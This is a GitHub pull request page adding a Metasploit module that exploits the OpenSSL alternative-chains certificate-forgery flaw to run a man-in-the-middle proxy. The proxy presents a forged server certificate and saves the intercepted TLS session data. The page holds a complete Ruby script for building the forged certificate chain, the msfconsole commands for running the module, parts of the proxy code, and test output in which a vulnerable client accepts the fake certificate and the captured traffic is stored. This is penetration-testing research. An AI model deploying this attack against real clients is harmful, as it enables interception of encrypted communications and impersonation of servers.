New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add openssl_altchainsforgery_mitm_proxy.rb #5735

Merged
merged 2 commits into from Jul 24, 2015

Conversation

Projects
None yet
4 participants
@rcvalle
Contributor

rcvalle commented Jul 16, 2015

This module exploits a logic error in OpenSSL by impersonating the server and sending a specially-crafted chain of certificates, resulting in certain checks on untrusted certificates to be bypassed on the client, allowing it to use a valid leaf certificate as a CA certificate to sign a fake certificate. The SSL/TLS session is then proxied to the server allowing the session to continue normally and application data transmitted between the peers to be saved. This module requires an active man-in-the-middle attack.

Add openssl_altchainsforgery_mitm_proxy.rb
This module exploits a logic error in OpenSSL by impersonating the
server and sending a specially-crafted chain of certificates, resulting
in certain checks on untrusted certificates to be bypassed on the
client, allowing it to use a valid leaf certificate as a CA certificate
to sign a fake certificate. The SSL/TLS session is then proxied to the
server allowing the session to continue normally and application data
transmitted between the peers to be saved. This module requires an
active man-in-the-middle attack.
@rcvalle

This comment has been minimized.

Contributor

rcvalle commented Jul 16, 2015

To test this exploit module:

  1. Run the following script to create the certificates:
require 'openssl'

root_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA')
root_ca_key = OpenSSL::PKey::RSA.new(2048)
root_ca_cert = OpenSSL::X509::Certificate.new
root_ca_cert.issuer = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA')
root_ca_cert.not_after = Time.now + 86400
root_ca_cert.not_before = Time.now
root_ca_cert.public_key = root_ca_key.public_key
root_ca_cert.serial = 0
root_ca_cert.subject = root_ca_name
root_ca_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, root_ca_cert)
root_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
root_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
root_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
root_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new)

inter_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Intermediate Inc./CN=Intermediate CA')
inter_ca_key = OpenSSL::PKey::RSA.new(2048)
inter_ca_cert = OpenSSL::X509::Certificate.new
inter_ca_cert.issuer = root_ca_name
inter_ca_cert.not_after = Time.now + 86400
inter_ca_cert.not_before = Time.now
inter_ca_cert.public_key = inter_ca_key.public_key
inter_ca_cert.serial = 0
inter_ca_cert.subject = inter_ca_name
inter_ca_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, inter_ca_cert)
inter_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
inter_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
inter_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
inter_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new)

subinter_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Example Inc./CN=Example CA')
subinter_ca_key = OpenSSL::PKey::RSA.new(2048)
subinter_ca_cert = OpenSSL::X509::Certificate.new
subinter_ca_cert.issuer = subinter_ca_name
subinter_ca_cert.not_after = Time.now + 86400
subinter_ca_cert.not_before = Time.now
subinter_ca_cert.public_key = subinter_ca_key.public_key
subinter_ca_cert.serial = 0
subinter_ca_cert.subject = subinter_ca_name
subinter_ca_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(inter_ca_cert, subinter_ca_cert)
subinter_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true))
subinter_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true))
subinter_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
subinter_ca_cert.sign(subinter_ca_key, OpenSSL::Digest::SHA1.new)

open('roots.pem', 'w') do |io|
  io.write(inter_ca_cert.to_pem)
  io.write(subinter_ca_cert.to_pem)
end

subinter_ca_cert.issuer = inter_ca_name
subinter_ca_cert.sign(inter_ca_key, OpenSSL::Digest::SHA1.new)

open('subinter_ca.pem', 'w') do |io|
  io.write(subinter_ca_cert.to_pem)
end

leaf_name = OpenSSL::X509::Name.parse('/C=US/O=Example Inc./CN=*.example.com')
leaf_key = OpenSSL::PKey::RSA.new(2048)
leaf_cert = OpenSSL::X509::Certificate.new
leaf_cert.issuer = subinter_ca_name
leaf_cert.not_after = Time.now + 3600
leaf_cert.not_before = Time.now
leaf_cert.public_key = leaf_key.public_key
leaf_cert.serial = 0
leaf_cert.subject = leaf_name
leaf_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(subinter_ca_cert, leaf_cert)
leaf_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:FALSE', true))
# It isn't mentioned anywhere but the valid leaf certificate must not
# contain the keyUsage extension or it must have at least the keyCertSign
# bit set (see X509_check_issued function in crypto/x509v3/v3_purp.c);
# otherwise; X509_verify_cert fails with
# X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY. Do NOT uncomment the
# following line.
# leaf_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment'))
leaf_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
leaf_cert.sign(subinter_ca_key, OpenSSL::Digest::SHA1.new)

open('untrusted.pem', 'w') do |io|
  io.write(subinter_ca_cert.to_pem)
  io.write(leaf_cert.to_pem)
end

open('leaf.pem', 'w') do |io|
  io.write(leaf_cert.to_pem)
end

open('key.pem', 'w') do |io|
  io.write(leaf_key.to_pem)
end

fake_name = OpenSSL::X509::Name.parse('/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com')
fake_key = OpenSSL::PKey::RSA.new(2048)
fake_cert = OpenSSL::X509::Certificate.new
fake_cert.issuer = leaf_name
fake_cert.not_after = Time.now + 3600
fake_cert.not_before = Time.now
fake_cert.public_key = fake_key.public_key
fake_cert.serial = 0
fake_cert.subject = fake_name
fake_cert.version = 2
extension_factory = OpenSSL::X509::ExtensionFactory.new(leaf_cert, fake_cert)
fake_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:FALSE', true))
fake_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment'))
fake_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash'))
fake_cert.sign(leaf_key, OpenSSL::Digest::SHA1.new)

open('bad.pem', 'w') do |io|
  io.write(fake_cert.to_pem)
end
  1. Run this exploit module:
use auxiliary/server/openssl_altchainsforgery_mitm_proxy
set CACERT /path/to/subinter_ca.pem
set CERT /path/to/leaf.pem
set KEY /path/to/key.pem
set HOST www.example.com
  1. If you have a vulnerable version of OpenSSL installed, use the SSL/TLS client program:
openssl s_client -connect localhost:443 -CAfile /path/to/roots.pem

The fake certificate should be verified without errors and you should see "Verify return code: 0 (ok)" in the output.
3. Alternatively, clone the OpenSSL git repository.
4. Change the current working directory to the working tree of the cloned repository.
5. To test on OpenSSL 1.0.2 stable branch:

git checkout origin/OpenSSL_1_0_2-stable
git reset --hard f404943bcab4898d18f3ac1b36479d1d7bbbb9e6

Copy the roots.pem, untrusted.pem, and bad.pem files created to the tests/certs/ directory in the working tree of the cloned repository.

git checkout c0b674b7cbd9146982850523293c74b9131b26d5 crypto/x509/x509_vfy.c
./config && make && make test

To test on OpenSSL 1.0.1 stable branch:

git checkout origin/OpenSSL_1_0_1-stable
git reset --hard d42d1004332f40c1098946b0804791fd3da3e378

Copy the roots.pem, untrusted.pem, and bad.pem files created to the tests/certs/ directory in the working tree of the cloned repository.

git checkout cb6e0ed17a61ae3711d385f517d61be2b4c33a55 crypto/x509/x509_vfy.c
./config && make && make test

The verify_extra_test test should fail.

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Jul 17, 2015

Great work, @rcvalle!

@jvazquez-r7 jvazquez-r7 self-assigned this Jul 17, 2015

register_options(
[
OptString.new('CACERT', [ true, "The leaf certificate's CA certificate", nil]),

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

I feel like the module should allow to generate the CERT's for the HOST trying to target. Otherwise anyone trying to use this module must be aware of the correct way to create the certificates, and according to your ruby code, looks like there are some caveats to have into account:

# It isn't mentioned anywhere but the valid leaf certificate must not
# contain the keyUsage extension or it must have at least the keyCertSign
# bit set (see X509_check_issued function in crypto/x509v3/v3_purp.c);
# otherwise; X509_verify_cert fails with
# X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY. Do NOT uncomment the
# following line.
# leaf_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment'))

Since the ruby code is already there (in the PR). I'm not sure why certs creation isn't facilitated from within the module.... I guess I'm missing something... I'm just doing some monkey review just now ... :( So clarifications are welcome!

This comment has been minimized.

@rcvalle

rcvalle Jul 17, 2015

Contributor

I didn't understand your question. The module does create the certificate for the HOST (i.e., fake_cert). However, you need a valid leaf certificate, which you already have or will obtain from a real CA, to sign it. This valid leaf certificate that must not contain the keyUsage extension or must have at least the keyCertSign bit set (or be a proxy certificate and have the digitalSignature bit set). The script above creates the certificates to simulate it.

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

And this clarifies :-) thanks!

context.key = fake_key
tcp_server = TCPServer.new(local_host, local_port)
proxy = OpenSSL::SSL::SSLServer.new(tcp_server, context)

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

Woud be neat if Rex::Socket::SslTcpServer could be used instead. Rex::Socket::SslTcpServer allows to provide an OpenSSL::SSL::SSLContext to use with the sslctx attribute.

Again, maybe I'm forgetting something. If you tried to use Rex::Socket::SslTcpServer already and it can not be used because of anything, feel free to clarify :-)

Also, ping @hmoore-r7 and/or @jlee-r7 because they use to master Rex::Socket in case I'm asking / providing erroneous feedback!

This comment has been minimized.

@rcvalle

rcvalle Jul 17, 2015

Contributor

I'm having problems with Rex::Socket::TcpServer and I didn't have time to look into those yet. Let me know whether you prefer to merge these PRs now and I fix later or wait for me to add the fixes before merging.

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

I see. I bet you mean having problems with Rex::Socket::SslTcpServer. I'd rather to use Rex sockets before landing (unless there is an stopper to use them). Same with the Rex relay. Otherwise sounds like the chances of it never updated increase :P

Of course, unless there is an stopper with using Rex sockets here. I didn't try, but my first impression was which should be possible.

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

On the other hand, if you don't find the time I'll try to help next week, would plan :) I definitely would like to see this module landing into master!

begin
loop do
readable, _, _ = IO.select([client, server])

This comment has been minimized.

@jvazquez-r7

jvazquez-r7 Jul 17, 2015

Contributor

On #5513 @hmoore-r7 requested to: "Preferably this would use the existing Rex::Socket APIs instead (or use an existing Relay implementation in Rex)"

If Rex::Socket::SslTcpServer is used probably this comment applies here too. I've the feeling he means to use Rex::Services::LocalRelay... but just in case.. ping @hmoore-r7 :)

@jvazquez-r7

This comment has been minimized.

Contributor

jvazquez-r7 commented Jul 17, 2015

Other than the comments above, it works =D

msf auxiliary(openssl_altchainsforgery_mitm_proxy) >
[*] Listening on 0.0.0.0:443
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717162533_default_172.16.158.1_tls.application__193588.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717162542_default_172.16.158.1_tls.application__705199.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717162948_default_172.16.158.1_tls.application__268819.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717163056_default_172.16.158.1_tls.application__431984.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[*] 15 bytes received
[*] 15 bytes sent
[*] 1 bytes received
[*] 1 bytes sent
[*] 177 bytes received
[*] 177 bytes sent
[*] 397 bytes received
[*] 397 bytes sent
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717163205_default_172.16.158.1_tls.application__199193.bin
[*] Accepted connection from 172.16.158.1:443
[*] Connected to www.example.com:443
[*] 1 bytes received
[*] 1 bytes sent
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150717163356_default_172.16.158.1_tls.application__907136.bin

On the client, with a vulnerable openssl:

$ apps/openssl s_client -connect www.example.com:443 -CAfile /tmp/roots.pem 
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
CONNECTED(00000003)
depth=2 C = US, O = Example Inc., CN = Example CA
verify return:1
depth=1 C = US, O = Example Inc., CN = *.example.com
verify return:1
depth=0 C = US, ST = California, L = Mountain View, O = Example Inc, CN = *.example.com
verify return:1
---
Certificate chain
 0 s:/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com
   i:/C=US/O=Example Inc./CN=*.example.com
 1 s:/C=US/O=Example Inc./CN=*.example.com
   i:/C=US/O=Example Inc./CN=Example CA
 2 s:/C=US/O=Example Inc./CN=Example CA
   i:/C=US/O=Intermediate Inc./CN=Intermediate CA
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIDWzCCAkOgAwIBAgIBADANBgkqhkiG9w0BAQUFADA8MQswCQYDVQQGEwJVUzEV
MBMGA1UECgwMRXhhbXBsZSBJbmMuMRYwFAYDVQQDDA0qLmV4YW1wbGUuY29tMB4X
DTE1MDcxNzIxMjQ1OFoXDTE1MDcxNzIyMjQ1OFowaDELMAkGA1UEBhMCVVMxEzAR
BgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDU1vdW50YWluIFZpZXcxFDASBgNV
BAoMC0V4YW1wbGUgSW5jMRYwFAYDVQQDDA0qLmV4YW1wbGUuY29tMIIBIjANBgkq
hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmCouN86EfRN6YNKN6RkHuSusSoHR2TMz
lVEa3dPCHHjV3eOrcTqex6sWA2gT1CFfEAylEwhcjlJyCQk+6Er0Sf5e0JTws16F
pwYPrgIms13owM0Wafgj3/nLM3TWk23/8bVUKJrT3zIhOAVC0C1wA975Sv98CFJ8
TZf1G/D9pyJ5vhYkQvivN6o9fQLSseUyPmoQ0fyJeNVn0Dndb7X/m0cVzqSeE9Xv
cC7KCDNOQlAi+USCYW6xNjU0DQPdn/M75ASZ7ge44NGx9FdewIADM5dp9YunfiCi
HA3qlttWTHysixAOTReokQM8PiqI8Ptcrzv3bsm+REO47AhZ+4kYBQIDAQABozww
OjAMBgNVHRMBAf8EAjAAMAsGA1UdDwQEAwIF4DAdBgNVHQ4EFgQUV9J7/v2DXff5
SnrY+vHy3bNra5wwDQYJKoZIhvcNAQEFBQADggEBADbAgqAlblEDnjjdQbpl4OAw
2OpWT2zHP3cd8NSAjR75jAwfQIo4ys06SAVAwufmlMZzHdFocwjKumVfODcGkcyP
vrw3/qW5yA0G6t7Rnjcxwt7iTXtHvyDPkddQ5U0PY9eZsLCsMA4Fhc0mn1RtCWpc
iSkH95R39cVf2AfUtR2zFqvwRl/I1MCrZi4wXHSSttcQ+YPpvU/nVArI9tf5aVQX
tVk07whJM2PD08M0hrQf7CYzYLwIpOqQVR5Rnk0I6UmWqypsywOuaJ1ZAUde7Atk
3dERwxOiFOIoURv4PM5HRfpNB0mouaKA6aJgK31oNONzjMYh2g5Cp5AID08WffI=
-----END CERTIFICATE-----
subject=/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com
issuer=/C=US/O=Example Inc./CN=*.example.com
---
No client certificate CA names sent
Peer signing digest: SHA512
Server Temp Key: DH, 1024 bits
---
SSL handshake has read 3377 bytes and written 507 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : DHE-RSA-AES256-GCM-SHA384
    Session-ID: D6B43F8F6590CD9EDB93E2073371ACB011224404B80B91C4830FB06FDFE2A940
    Session-ID-ctx: 
    Master-Key: CE4D97205814DE9DB4FB92677C9719264A01A4AC2B84FB65C28DA689C449A51320F86053915C2A8A9743D36593283861
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 5c e8 c6 ca 36 59 67 0c-1f ef bc d2 3d a0 17 0c   \...6Yg.....=...
    0010 - 7b bc d8 3d 9e 86 1d 34-fa 2a e9 34 44 28 3a 08   {..=...4.*.4D(:.
    0020 - df e2 1c 0a 60 b2 33 95-ae 5c be 0c 9d 8d 2c d5   ....`.3..\....,.
    0030 - 19 56 c5 71 81 fa da a9-a3 07 c1 e0 ee b0 88 b4   .V.q............
    0040 - 79 6b 79 7a 98 e9 41 a7-a1 fb 90 9b 85 86 4b bf   ykyz..A.......K.
    0050 - 77 05 98 80 49 19 77 83-18 b9 32 c9 52 91 04 63   w...I.w...2.R..c
    0060 - e9 94 e8 1d 49 98 9a e5-9f 00 53 24 7a bf 5a fd   ....I.....S$z.Z.
    0070 - 1a 47 c6 e6 78 f1 6d 91-4c f2 36 91 8c 2b 79 66   .G..x.m.L.6..+yf
    0080 - 3a b7 d7 a4 c3 1c 6a 2e-95 3f 00 25 d0 05 b7 c2   :.....j..?.%....
    0090 - 10 f3 49 d9 94 c0 60 6a-54 05 c5 47 6e 81 e3 87   ..I...`jT..Gn...
    00a0 - 6a 1d f5 25 53 d1 d5 88-29 e8 9b 55 a9 5f 7d d6   j..%S...)..U._}.
    00b0 - c0 94 cf fd af 10 3b a5-ce 84 b0 ad 18 a8 40 77   ......;.......@w

    Start Time: 1437168305
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)

That's an awesome and fast work =) Thanks a lot for sharing @rcvalle !

@jvazquez-r7 jvazquez-r7 merged commit 449c751 into rapid7:master Jul 24, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

jvazquez-r7 added a commit that referenced this pull request Jul 24, 2015

@jvazquez-r7

This comment has been minimized.

Contributor

jvazquez-r7 commented Jul 24, 2015

@rcvalle, finally I've been doing cleaning by myself and landed. My changes to use Rex sockets are here: 45b4334

I tried to use Rex::Services::LocalRelay as recommended by @hmoore-r7 but unfortunately got the next error when trying to use SSL sockets with a LocalRelay

[07/24/2015 14:31:24] [e(0)] rex: Error in #<Rex::Services::LocalRelay:0x007fb5140f2e38> monitor_relays read: Invalid sysread() call on SSL socket

Apparently LocalRelay isn't working fine with Rex SSL sockets :\ I couldn't find any sample in the framework of Rex SSL sockets working with LocalRelay, so decided to skip. As far as we're using Rex sockets, and also allowing the framework to close sockets / cleanup I think we're fine to land :)

Hope I didn't waste nothing, feel free to review the landed version!

My test before landing:

  • Running the relay on the msfconsole:
msf > resource /tmp/ssl.rc
[*] Processing /tmp/ssl.rc for ERB directives.
resource (/tmp/ssl.rc)> use auxiliary/server/openssl_altchainsforgery_mitm_proxy
resource (/tmp/ssl.rc)> set CACERT /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/subinter_ca.pem
CACERT => /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/subinter_ca.pem
resource (/tmp/ssl.rc)> set CERT /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/leaf.pem
CERT => /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/leaf.pem
resource (/tmp/ssl.rc)> set HOST www.example.com
HOST => www.example.com
resource (/tmp/ssl.rc)> set KEY /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/key.pem
KEY => /Users/jvazquez/Projects/Rapid7/pr/5735_openssl/key.pem
resource (/tmp/ssl.rc)> set SRVHOST 172.16.158.1
SRVHOST => 172.16.158.1
resource (/tmp/ssl.rc)> run
[*] Auxiliary module execution completed
msf auxiliary(openssl_altchainsforgery_mitm_proxy) >
[*] Listening on 172.16.158.1:443
[*] Accepted connection from 172.16.158.132:43084
[*] Connected to www.example.com:443
[*] 6 bytes received
[*] 6 bytes sent
[*] 155 bytes received
[*] 155 bytes sent
[*] 349 bytes received
[*] 349 bytes sent
[+] SSL/TLS session application data successfully stored in /Users/jvazquez/.msf4/loot/20150724143748_default_172.16.158.132_tls.application__236080.bin
  • The acquired file:
cat /Users/jvazquez/.msf4/loot/20150724143748_default_172.16.158.132_tls.application__236080.bin
[*] exec: cat /Users/jvazquez/.msf4/loot/20150724143748_default_172.16.158.132_tls.application__236080.bin

hello
HTTP/1.0 400 Bad Request
Content-Type: text/html
Content-Length: 349
Connection: close
Date: Fri, 24 Jul 2015 19:37:47 GMT
Server: ECSF (cpm/F99F)

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title>400 - Bad Request</title>
    </head>
    <body>
        <h1>400 - Bad Request</h1>
    </body>
</html>
@jvazquez-r7

This comment has been minimized.

Contributor

jvazquez-r7 commented Jul 24, 2015

Also, on the victim:

$ apps/openssl s_client -connect www.example.com:443 -CAfile /tmp/roots.pem 
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
CONNECTED(00000003)
depth=2 C = US, O = Example Inc., CN = Example CA
verify return:1
depth=1 C = US, O = Example Inc., CN = *.example.com
verify return:1
depth=0 C = US, ST = California, L = Mountain View, O = Example Inc, CN = *.example.com
verify return:1
---
Certificate chain
 0 s:/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com
   i:/C=US/O=Example Inc./CN=*.example.com
 1 s:/C=US/O=Example Inc./CN=*.example.com
   i:/C=US/O=Example Inc./CN=Example CA
 2 s:/C=US/O=Example Inc./CN=Example CA
   i:/C=US/O=Intermediate Inc./CN=Intermediate CA
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIDWzCCAkOgAwIBAgIBADANBgkqhkiG9w0BAQUFADA8MQswCQYDVQQGEwJVUzEV
MBMGA1UECgwMRXhhbXBsZSBJbmMuMRYwFAYDVQQDDA0qLmV4YW1wbGUuY29tMB4X
DTE1MDcyNDE5NDk1OVoXDTE1MDcyNDIwNDk1OVowaDELMAkGA1UEBhMCVVMxEzAR
BgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDU1vdW50YWluIFZpZXcxFDASBgNV
BAoMC0V4YW1wbGUgSW5jMRYwFAYDVQQDDA0qLmV4YW1wbGUuY29tMIIBIjANBgkq
hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8MZ+roTYdLYKyDcaou1ypcs84FPWngJ7
UpuosvLloK2O1WszzBgWzRtydA7zGr8POz6wjiNy3qT8rOXhgreIElYK6f1yZfqA
ChXsdzyBIrDi8vfOQYtwrpH3dSdH++UuouGSx7xB72BqFYmTC9vT9NVKYqrEYN8I
lpSX2K0CXaizguTeV80fwDr4E4FT/GO4GY+yHXpSD5yLvyMK4ckzCn6XpsOtP8lo
ICsaX1KnweGHETbV8YLbWURUxmNs4QEML2XWU3p3fUjFxQUTTsFrSgJBA4JS+BO7
tc905kusRXWJzSl5xBxEGNLDkg5q0iBgTRVJKqZ/7hoIdIk13TWQNQIDAQABozww
OjAMBgNVHRMBAf8EAjAAMAsGA1UdDwQEAwIF4DAdBgNVHQ4EFgQUwhai55hN9IJ9
FS7w7W06nz+vnRswDQYJKoZIhvcNAQEFBQADggEBAJA4Jm3XlEN0UjbwiSQTh6OD
wwCkAN/gctz0QNq+tKMWCI/1wPD7zmAUFnn4dgHNEXaf1AtamnOhSsPNki6NiaqS
XvWE3js531FXum5hBMsZVjuiqe5dwl/8YegY2EkufRnF6D3u/yT8y8j0+tIr/bVp
mgr1CKMefJUXtVR7YEfky3vrYRwy5bzNixHfDz4bwtUKnIdoKgmQqtPyLEaR6wPF
OOX8ipkiCYTn0W/nRZROn+pIoV3MavKCdQZsjXKCehVF99FRU72eHzgWazj0UHkz
F8efYtejE2H/ZtjUR7SaZeg7/c4Wt9nh7ycN2baZBVVYu9gI8RTeUUeGngwBE8E=
-----END CERTIFICATE-----
subject=/C=US/ST=California/L=Mountain View/O=Example Inc/CN=*.example.com
issuer=/C=US/O=Example Inc./CN=*.example.com
---
No client certificate CA names sent
Peer signing digest: SHA512
Server Temp Key: DH, 1024 bits
---
SSL handshake has read 3346 bytes and written 507 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : DHE-RSA-AES256-GCM-SHA384
    Session-ID: F8B2ED0B57413BED95C326A40A50C02FE51A167CA76D5058C294A3C3D9E81CC8
    Session-ID-ctx: 
    Master-Key: 3D5955221943CB2E7D622C49E0C3F8B0231E6F5E741853268495AA72A332294CF975E96150B84C88D34DE1C91DF29A8D
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - f5 c0 57 7c 0f 29 95 c2-70 6c d1 ed f0 3a 53 6f   ..W|.)..pl...:So
    0010 - 9d 4d 65 35 ba 82 05 f2-fe 29 7c 7a 5f c2 23 d2   .Me5.....)|z_.#.
    0020 - 61 ce f8 9a 4e 07 fa fb-7c 51 98 d2 40 3a 15 a8   a...N...|Q..@:..
    0030 - 4b 3b c6 fc 4e b7 81 7e-bc d3 d8 66 c5 d2 c0 5b   K;..N..~...f...[
    0040 - df fa 9d ed 76 74 88 3b-3c 4d c6 74 3f 30 e2 77   ....vt.;<M.t?0.w
    0050 - f2 b2 5d 28 3e 41 d5 55-e1 7e c8 8f b5 7c 18 e3   ..](>A.U.~...|..
    0060 - 1d a4 50 92 33 e7 b4 70-e3 ad 5b 60 84 f6 bd 1b   ..P.3..p..[`....
    0070 - 6b ad 2d 70 51 4b 2b bb-48 4d ca cb 6b ad ec 06   k.-pQK+.HM..k...
    0080 - e2 c4 ad 1e af 9d 1c d6-da 98 f1 3b 92 1d 32 a6   ...........;..2.
    0090 - bf 7a a5 c8 ec ab 67 7c-0d 0b d4 02 5a 5e b7 c5   .z....g|....Z^..

    Start Time: 1437767403
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
hello
HTTP/1.0 400 Bad Request
Content-Type: text/html
Content-Length: 349
Connection: close
Date: Fri, 24 Jul 2015 19:50:06 GMT
Server: ECSF (cpm/F9C4)

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title>400 - Bad Request</title>
    </head>
    <body>
        <h1>400 - Bad Request</h1>
    </body>
</html>
closed

@rcvalle

This comment has been minimized.

Contributor

rcvalle commented Jul 24, 2015

@jvazquez-r7 Looks good to me! Thank you!

@hdm

This comment has been minimized.

Contributor

hdm commented Jul 24, 2015

The socket is not SSL yet.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment